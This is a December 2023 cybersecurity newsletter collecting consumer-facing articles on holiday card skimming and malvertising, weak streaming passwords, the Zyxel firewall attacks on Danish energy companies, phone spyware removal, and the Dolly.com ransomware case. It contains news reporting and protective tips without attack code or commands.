2023 December Cyber Bytes

Online stores may not be as secure as you think

Credit card skimming is on the rise for the holiday shopping season, according to Malwarebytes.

HelpNetSecurity.com on November 23, 2023

Online stores are not always as secure as you might think they are, and yet you need to hand over your valuable credit card information in order to buy anything. When a merchant website is hacked, any purchase made has the potential of being intercepted by bad actors. Often, the malicious code is right underneath the surface and yet completely invisible to shoppers.


The report details a specific credit card skimming operation, the Kritec campaign, which specializes in crafting very realistic payment templates with convincing language localization that has compromised hundreds of websites.

Malwarebytes threat researchers tracked a 50% increase month-over-month in the US since September in newly registered domains attributed to Kritec, demonstrating a huge uptick in both compromised sites and opportunity for innocent shoppers to fall victim.

“Embrace the magic of the holidays (and the season’s cyber deals), but don’t forget to safeguard your digital gifts,” warns Jérôme Segura, senior director of threat research, Malwarebytes. “Whether shopping online or booking your experience with Santa, be aware that cybercriminals have laid the groundwork to take advantage of the holiday shopping season via both obvious and very subtle avenues.”

Another risk to shoppers this holiday season is malvertising – online ads that deliver scams or install malware. This type of fraud is on the rise in both volume of malicious ads and the sophistication behind them. Over the past two months, Malwarebytes has tracked a 42% increase month-over-month in malvertising incidents in the US, pointing to an alarming trend.

Recent research reveals malicious campaigns carried out in online ads via Google searches, some impersonating big-name brands and scams targeting online tech support for Windows users.

For many online scams, it is near impossible for an individual, even a highly skilled one, to know when they’re using a website that includes a third-party component compromised by criminal hackers or operated by a company prepared to bend the rules at the expense of the user’s privacy and security.

Tips for safer online shopping
Avoid clicking on sponsored ads: Conduct a direct search for your retailer of choice to avoid falling prey to prevalent malvertising tactics which have been known to spoof even huge, reputable brands such as Amazon.

Check that copyright: Avoid inputting any payment information into websites that don’t look like they’ve been maintained for a while. Red flags include outdated visuals and old copyright stamps.

Consider a password manager and MFA: With every site requiring a password these days, leverage a password manager to protect your payment information and set up multi-factor authentication where available.

Keep an eye on your financial statements: An uptick in online shopping deserves an uptick in your vigilance for checking online bank and credit card statements. Flag anything that seems suspicious for quick resolution.

Run an antivirus solution: Most antivirus products offer some kind of web protection that detects malicious domains and IP addresses.

Stop using weak passwords for streaming services - it's riskier than you think

Using a simple password for Netflix, Hulu, Disney+, or another service can expose your personal data to hackers.

ZDNet.com by Lance Whitney on November 16, 2023

Have you ever tried to create or type a password for a streaming service directly on your TV screen? If so, you know how clumsy it is. Using a remote control to hunt and peck each character is such a maddening process that you may be tempted to use a short and simple password. But that's not a good idea.

Cybercriminals look for weak and insecure passwords not just across PCs, mobile devices, and websites but on streaming services. That includes the passwords you create on your TV or streaming box and those you may share with family, friends, and other people who use the same service.

To illustrate the temptation toward creating short, simple, and weak passwords, password manager NordPass looked at the 200 most common passwords used by people around the world. For the fifth edition of this annual report, NordPass found that individuals still turn to the weakest possible passwords despite the risks of malware, theft, and account compromise.

The top 10 passwords overall were:

123456
admin
12345678
123456789
1234
12345
password
123
Aa123456
1234567890

The password '123456' has held the top spot four times out of the past five years, a sign that people continue to rely on this simple stream of characters. Most of the other passwords are variations on the same theme. Regardless of which password people use, all of these top ten could be cracked by a hacker in less than a second.

The results were actually worse for passwords used for streaming services. The 10 most common passwords for streaming platforms were:

123456
12345
123456789
12345678
netflix
UNKNOWN
123123
1234567890
netflix123
qwerty

"We've noticed that streaming passwords are, on average, weaker," NordPass chief technology officer Tomas Smalakys told ZDNET. "I could only assume that it's because people tend to share them, therefore create easier ones to remember, as well as the reason that they have to type it on a TV."

Using weak passwords for streaming services is problematic as they're easy prey for malware capable of stealing personal information, Smalakys said. Malware can capture a lot of data saved in a person's browser, such as usernames, passwords, and email addresses. But other details are just as vulnerable, including saved browser credentials, browser cookies, browser autofill data, and credit cards saved in the browser.

To compile the list of passwords, NordPass worked with independent cybersecurity researchers. Together, they analyzed a 4.3TB database taken from public sources, including those on the dark web. They also evaluated a 6.6TB database comprised of passwords stolen by different malware strains, such as Redline, Vidar, Taurus, Raccoon, Azorult, and Cryptbot. The malware logs contained not just passwords but the source websites so that hackers knew which users and which sites to target.

So how can people create more secure passwords and protect their streaming accounts and other services from compromise? Smalakys offers a few pieces of advice.

"I'd recommend setting up 2FA (two-factor authentication), if your streaming service allows this option," Smalakys said. "Also, try out alternative authentication methods. The majority of streaming services allow logging in by users scanning a QR code with their phone. If not, I'd still recommend setting up long and random passwords -- a couple of minutes of a person's time is definitely worth spending to stay secure."

Passkeys are slowly catching on as a more secure and simpler alternative to passwords. Companies such as Amazon, Apple, Google, Microsoft, and Yahoo now support passkeys. However, until more websites allow for this passwordless type of authentication, your best bet is to use a password manager. But the method you use to manage your passwords makes a big difference.

Smalakys advises against saving passwords in a browser and instead recommends that people use a dedicated password manager. Both types can store passwords and encrypt them end to end, he said. But the difference lies in how the password vault is protected. To safeguard your credentials, browser password managers and dedicated password managers both create private keys stored on the client side and public keys stored on a server. But password managers go a step further.

"What's really important is that password managers also encrypt a private key upon creation of a master password (most browser password managers do not have a master password)." Smalakys explained. "Therefore, if a hacker installs malware on your device, they can acquire the private key and access vault contents stored in the browser password manager. With password managers, even if a hacker acquires a private key to the user's vault, it will be encrypted and thus not usable."

Danish energy sector hit by a wave of coordinated cyberattacks

The Danish energy sector has suffered what is believed to be the most extensive cyberattack in Danish history, according to SektorCERT.

HelpNetSecurity.com by Helga Labus on November 14, 2023

SektorCERT, an organization owned and funded by Danish critical infrastructure (CI) companies, uses a network of 270 sensors implemented across the country and these organizations to monitor internet traffic and detect possible cyberattacks.

From this vantage point, in May 2023, they detected three waves of attacks targeting companies in the energy sector.

The first one started on May 11, when the attackers simultaneously exploited a command injection vulnerability (CVE-2023-28771) in Zyxel firewalls deployed at 16 companies. The attackers gained control of the devices at 11 companies and had access to the critical infrastructure behind it, SektorCERT says. They used the access to grab data about the configuration and active accounts.

Even though CVE-2023-28771 was patched by Zyxell in April 2023, for various reasons the attacked companies did not install the latest updates. The interesting thing, though, is that the attackers knew exactly which companies to hit.

“At this time, information about who had vulnerable devices was not available on public services such as Shodan. Therefore, the attackers had to have obtained information about who had vulnerable firewalls in some other way,” the organization noted, and added that their sensors did not register scans that attackers might have performed prior the attacks.

“The other remarkable thing was that so many companies were attacked at the same time. This kind of coordination requires planning and resources.”

SektorCERT’s incident response team managed to stop the attackers before they could start further exploiting the achieved access.

On May 22, a second wave of attacks started. SektorCERT was alerted by a sensor that one of its member organizations was downloading new firewall software over an insecure connection. This allowed the attackers to include the infrastructure in the Mirai botnet and use it to carry out a DDoS attack against targets in Hong Kong and the US, before the compromised organization disconnected from the internet and went into “island mode” (i.e., isolated from the national electricity distribution network.)

SektorCERT researchers believe that, during the second wave, the attackers also exploited two new vulnerabilities (CVE-2023-33009 and CVE-2023-33010) that Zyxel disclosed and patched a few days later (May 24).

Possible Sandworm involvement
A series of additional attacks went on until May 24, when SektorCERT has been alerted of network traffic to one of the compromised organizations coming from an IP previously used by the Sandworm APT, which has been known to target the Ukrainian energy grid for many years.

“Whether Sandworm was involved in the attack cannot be said with certainty. Individual indicators of this have been observed, but we have no opportunity to neither confirm nor deny it,” SektorCERT said.

It is likely that some of the attacks were simply opportunistic, while others might have had a more sinister goal. But none of them affected the operation of the Danish power grid.

SektorCERT has provided indicators of compromise (IoCs) and offered 25 recommendations for technical and organizational measures that organizations should implement to keep their networks safe.

Removing spyware from your phone can be tricky. These options are your best bet

iPhone and Android users alike are facing more sophisticated surveillance threats than ever before. Suspect you're being tracked? Here's what to do right now.

ZDNet.com by Charlie Osborne on October 20, 2023

There are multiple ways to prevent a government agency, country, or cybercriminal from peeking into our digital lives, for example, by using virtual private networks (VPNs), end-to-end encryption, and browsers that do not track user activity.

But, it can be extremely difficult to detect or remove spyware once it's implanted in a device.

This guide will run through different forms of malicious software that could end up on your iOS or Android handset, what the warning signs of infection are, and how to remove such pestilence from your mobile devices -- whenever it is possible to do so.

We will also touch upon stalkerware and other ways threats closer to home may spy on you -- and what you can do about it.

What is spyware?
Spyware comes in many forms, and before you can tackle the problem, it's useful to know the basic differences.

Nuisanceware is often bundled with legitimate apps. It interrupts your web browsing with pop-ups, changes your homepage or search engine settings, and may also gather your browsing data in order to sell it off to advertising agencies and networks.

Although considered malvertising, nuisanceware is generally not dangerous or a threat to your core security. Instead, these malware packages are focused on illicit revenue generation by infecting machines and creating forced ad views or clicks.

There's also basic spyware. These generic forms of malware steal operating system and clipboard data and anything of potential value, such as cryptocurrency wallet data or account credentials. Spyware isn't always targeted and may be used in general phishing attacks.

Spyware may land on your device through phishing, malicious email attachments, social media links, or fraudulent SMS messages.

Advanced spyware, also known as stalkerware, is a step up from basic spyware. Unethical and sometimes dangerous, this malware is sometimes found on desktop systems, but it is now most commonly implanted on phones. Spyware and stalkerware may be used to monitor emails and SMS and MMS messages sent and received; to intercept live calls for the purpose of eavesdropping across standard telephone lines or Voice over IP (VoIP) applications; to covertly record environmental noise or take photos; to track victims via GPS; or to hijack social media apps such as Facebook and WhatsApp. Stalkerware may also include keylogging features.

Stalkerware is typically used to spy on someone as an individual and watch what they do, say, and where they go. Stalkerware is commonly linked to cases of domestic abuse.

Finally, there's government-grade commercial spyware. Pegasus is the most well-known recent case, sold to governments as a tool for combating terrorism and for law enforcement purposes. Pegasus ultimately was found on smartphones belonging to journalists, activists, political dissidents, and lawyers.

In November 2022, the Google Threat Analysis Group (TAG) published details on Heliconia, a new commercial spyware framework with a potential link to a private Spanish company.


What are the warning signs of a spyware infection attempt?
There are several signs to watch for that might indicate you are being targeted by a spyware or stalkerware operator.

Finding yourself the recipient of odd or unusual social media messages or emails might be part of a spyware infection attempt. You should delete these without clicking on any links or downloading any files.

The same is true for SMS messages, which may contain links to trick you into unwittingly downloading malware.

To catch a victim unaware, these phishing messages will lure you into clicking a link or executing software that hosts a spyware or stalkerware payload. If the malware is being loaded remotely, user interaction is required, and so these messages might try to panic you -- for example, by demanding payment to a tax office or bank, or by posing as a failed delivery notice. Messages could potentially use spoofed addresses from a contact you trust, too.

When it comes to stalkerware, initial infection messages may be more personal and tailored to the victim.

Physical access or the accidental installation of spyware by the victim is necessary. However, it can take less than a minute to install some variants of spyware and stalkerware.

If your phone goes missing or has been out of your possession for a time, and reappears with different settings or changes that you do not recognize, this may be an indicator of tampering.


What are the typical signs that spyware is on my phone?
You may experience unexpected handset battery drain, overheating, and strange behavior from the device's operating system or apps. Settings such as GPS and location functions may turn on unexpectedly or you may see random reboots. If you are suddenly using far more data than normal, this could be an indication that information is being sent from your smartphone or that remote connections are active. You may also have trouble turning off your device completely.

Certain forms of spyware focused on fraudulent revenue generation may be able to secure enough permissions to impact your bank balance. If you are signed up for services or premium SMS plans and you know you didn't consent to them, this could be a sign that spyware is on your device. Keep an eye on your credit cards for any signs of suspicious payments.

An important point to mention is that sometimes spyware or other forms of malicious software might end up on your device via an originally benign app. There have been cases of developers releasing a genuine, useful app in official repositories, such as a currency converter or weather app, and then -- after a large user base has been gathered -- the developers twist the app's functions.

Last year, Google removed malicious apps from the Google Play Store that had been masquerading as Bluetooth utilities and had been downloaded by over a million users. While the apps didn't appear malicious at first, within days, users were bombarded with ads and pop-ups.


What other signs might I see on Android and iOS devices?
Surveillance software is becoming more sophisticated and can be difficult to detect. However, not all forms of spyware and stalkerware are invisible, and it is possible to find out if you are being monitored.

Android
One telltale sign on an Android device is a setting that allows apps to be downloaded and installed outside of the official Google Play Store.

If this setting is enabled, this may indicate tampering and jailbreaking without your consent. Not every form of spyware and stalkerware requires a jailbroken device, though.

This setting is found in most modern Android builds in Settings > Security > Allow unknown sources. (This varies depending on the device and vendor.) You can also check Apps > Menu > Special Access > Install unknown apps to see if anything appears that you do not recognize, but there is no guarantee that spyware will show up on the app list.

Some forms of spyware will also use generic names and icons to avoid detection. For example, they may appear to be a useful utility app such as a calendar, calculator, or currency converter. If a process or app comes up on the app list that you are not familiar with, a quick search online may help you find out whether it is legitimate.

iOS 
iOS devices that aren't jailbroken are generally harder to install malware on than Android handsets -- unless an exploit for a zero-day or unpatched vulnerability is used against you. However, the same malware principles apply: With the right tool, exploit, or software, your device could be compromised either with physical access or remotely. You may be more susceptible to infection if you have not updated your iPhone's firmware to the latest version and you do not run frequent antivirus scans.

Both iOS and Android phones, however, will typically show symptoms of a malware infection.


How can I remove spyware from my device?
By design, spyware and stalkerware are hard to detect and can be just as hard to remove. It is not impossible in most cases, but it may take some drastic steps on your part. Sometimes the last-resort option may be to abandon your device.

When spyware is removed, especially in the case of stalkerware, some attackers will receive an alert warning them that the victim's device has been cleaned up. Should the flow of your information suddenly stop, this would be another clear sign to the attacker that the malicious software has been removed.

Do not tamper with your device if you feel your physical safety may be in danger. Instead, reach out to the police and supporting agencies.

Now, here are some removal options:

Run a malware scan: There are mobile antivirus solutions available that can detect and remove spyware. This is the easiest solution available, but it may not be effective in every case. Cybersecurity vendors, including Malwarebytes, Avast, and Bitdefender, all offer mobile spyware-scanning tools. 


Update your operating system: It may seem obvious, but when an operating system releases a new version, which often comes with security patches and upgrades, this can -- if you're lucky -- cause conflict and problems with spyware. Keep this updated.


If all else fails, factory reset... or junk it: Performing a factory reset and clean install on the device you believe is compromised may help eradicate some forms of spyware and stalkerware. However, make sure to back up important content first. On Android platforms, the reset option is usually found under Settings > General Management > Reset > Factory Data Reset. On iOS, go to Settings > General > Transfer or Reset phone. 
Google's guide to factory resetting your device can be found here, and Apple has also provided instructions on its support website.

Unfortunately, some stalkerware services may survive factory resets. So, failing all of that, consider restoring to factory levels and then throwing your device away.

If you have found suspicious software on your handset, consider the following:

Change your passwords: If you suspect account compromise, change the passwords of every important account you have. Many of us have one or two central "hub" accounts, such as an email address linked to all of our other services. Remove access to any such hub services you use from a compromised device.


Creating a new email address: Known only to you, the new email becomes tethered to your main accounts and this should, if it is safe, be an option you consider if stalkerware is involved. This can help wrestle back control of your accounts in a covet and quiet way, without alerting anyone.

What can I do about about advanced spyware like Pegasus?
Government-grade spyware can be more difficult to detect. However, as noted in a guide on Pegasus published by Kaspersky, there are some actions you can take to mitigate the risk of being subject to such surveillance, based on current research and findings:

Reboots: Reboot your device daily to prevent persistence from taking hold. The majority of infections have appeared to be based on zero-day exploits with little persistence; therefore, rebooting can hamper attackers.


Disable iMessage and FaceTime (iOS): As features enabled by default, iMessage and FaceTime are attractive avenues for exploitation. A number of new Safari and iMessage exploits have been developed in recent years. 


Use an alternative browser other than Safari or default Chrome: Some exploits do not work well on alternatives such as Firefox Focus. 


Use a trusted, paid VPN service, and install an app that warns when your device has been jailbroken. Some AV apps also will perform this check.  

It is also recommended that individuals who suspect a Pegasus infection make use of a secondary device, preferably running GrapheneOS, for secure communication.

How do I keep spyware and stalkerware off my device in the first place?
Unfortunately, no mobile device is completely protected against the scourge of spyware. However, we have provided some tips below to mitigate the risk of future infections:

Protect your device physically: Your first line of defense is to maintain adequate physical controls. Modern smartphones will allow you to set PIN codes and patterns or to use biometrics including fingerprints or retina scans to stop your handset from being physically tampered with. 


Update your operating system: When system updates are available, ensure you install them in a timely fashion. As they contain security fixes and patches, they are one of the most important defenses you have against malware.


Use antivirus software: There are mobile antivirus solutions available that can detect and remove spyware. Running frequent scans will help protect your handset.


Only download apps from official sources: The majority of spyware and malware is found outside of Google Play and Apple's App Store, so be cautious about installing apps from third-party websites. 


Watch out for malicious links: Mobile malware is often spread through phishing and malicious links, spread through platforms including social media services. These links may urge you to download apps from outside of Google Play or the App Store, and may be disguised as everything from antivirus software to streaming services.


Do not jailbreak your device: Jailbreaking not only voids your warranty but can open the door to malicious apps and software having a deep foothold in your OS, which may make removal extremely difficult, or impossible. 


Enable two-factor authentication (2FA): When account activity and logins require further consent from a mobile device, this can also help protect individual accounts. (However, spyware may intercept the codes sent during 2FA protocols.)

What are Google and Apple doing to protect Android and iOS devices?
Google and Apple are generally quick to tackle malicious apps that manage to avoid the privacy and security protections imposed in their respective official app stores.

Several years ago, Google removed seven apps from the Play Store that were marketed as employee and child trackers. The tech giant took a dim view of their overreaching functions -- including GPS device tracking, access to SMS messages, theft of contact lists, and potentially the exposure of communication taking place in messaging applications. Google has also banned stalkerware ads. However, some apps still apparently slip through the net.

Google's Threat Analysis Group is constantly publishing research on new commercial spyware strains and their potential targets.

Apple has cracked down on parental control apps, citing privacy-invading functions as the reason for removal. The company offers its own parental device control service called Screen Time for parents who want to limit their child's device usage. Furthermore, the company does not allow sideloading -- that is, the installing of third-party apps from sources other than Apple's App Store.

In 2022, Apple revealed the details of a $10 million grant to research ways to combat state-sponsored spyware.

Are parental control apps spyware?
There are threats and inappropriate material around every corner online, and while children often want a smartphone and to be on social media at a young age, parents want to be able to monitor what they are viewing and who they are interacting with online. This, in itself, is responsible, but at the core, parental control apps are designed for surveillance.

The main issue is the capacity for abuse. Standalone parental control apps can be abused and the permissions they require can be incredibly intrusive -- not only for children but in relation to anyone's privacy.

A balance between a right to privacy and protection has to be maintained, and it's a difficult tightrope to walk. Both Apple and Google have introduced parental controls for Android devices, Chromebooks, iPhones, and iPads. These platforms focus on restricting screen time, locking and unlocking devices, and features such as permissions list management, restricting web content and app downloads, and purchase approvals.

Dolly.com's ransomware attack and the betrayal of honor among thieves

LinkedIn.com by Jason Collins on November 11, 2023

Dolly.com, an on-demand moving and delivery platform, reportedly paid a ransom to attackers in exchange for deleting stolen customer data. However, the attackers broke their promise and released the data anyway. This incident highlights the betrayal of honor among thieves, which could harm companies' willingness to pay ransoms in the future.

Ransomware attacks have become increasingly common in recent years, and attackers are becoming more sophisticated and ruthless. In the past, there was an unwritten code of honor among thieves that dictated that attackers would uphold their end of the bargain if victims paid the ransom. However, this code of honor seems to be eroding, as evidenced by the Dolly.com attack.

The fact that the Dolly.com attackers broke their promise and released the data even after being paid is a worrying development. It could make companies less likely to pay ransoms in the future, making ransomware attacks even more costly and disruptive.

Impact on companies' willingness to pay ransoms

Companies are already facing a difficult decision when it comes to ransomware attacks. On the one hand, they may want to pay the ransom to avoid the disruption and reputational damage resulting from a data breach. On the other hand, they know that paying the ransom encourages attackers and could lead to more attacks in the future.

The Dolly.com attack makes this decision even more difficult. Companies now have to worry that even if they pay the ransom, the attackers may not uphold their end of the bargain. This could make companies less likely to pay ransoms, which could encourage attackers and lead to more attacks in an attempt to use the numbers game to find the one company that will pay.

How companies can mitigate the risks

There are many things that companies can do to mitigate the risks posed by ransomware attacks. These include:

* Implementing strong security measures to prevent attacks in the first place.
* Having a robust incident response plan in case of an attack.
* A backup and recovery plan minimizes the disruption caused by an attack.
* Educating employees about cybersecurity best practices.

Companies should also be prepared to negotiate with attackers if they do fall victim to a ransomware attack. However, they should be aware that there is no guarantee that attackers will uphold their end of the bargain, even if a ransom is paid.

Conclusion

The Dolly.com ransomware attack reminds companies they cannot trust attackers to uphold their promises. This could harm companies' willingness to pay ransoms in the future, making ransomware attacks even more costly and disruptive.

Companies should take steps to mitigate the risks posed by ransomware attacks by implementing strong security measures, having a robust incident response plan, having a backup and recovery plan, and educating employees about cybersecurity best practices.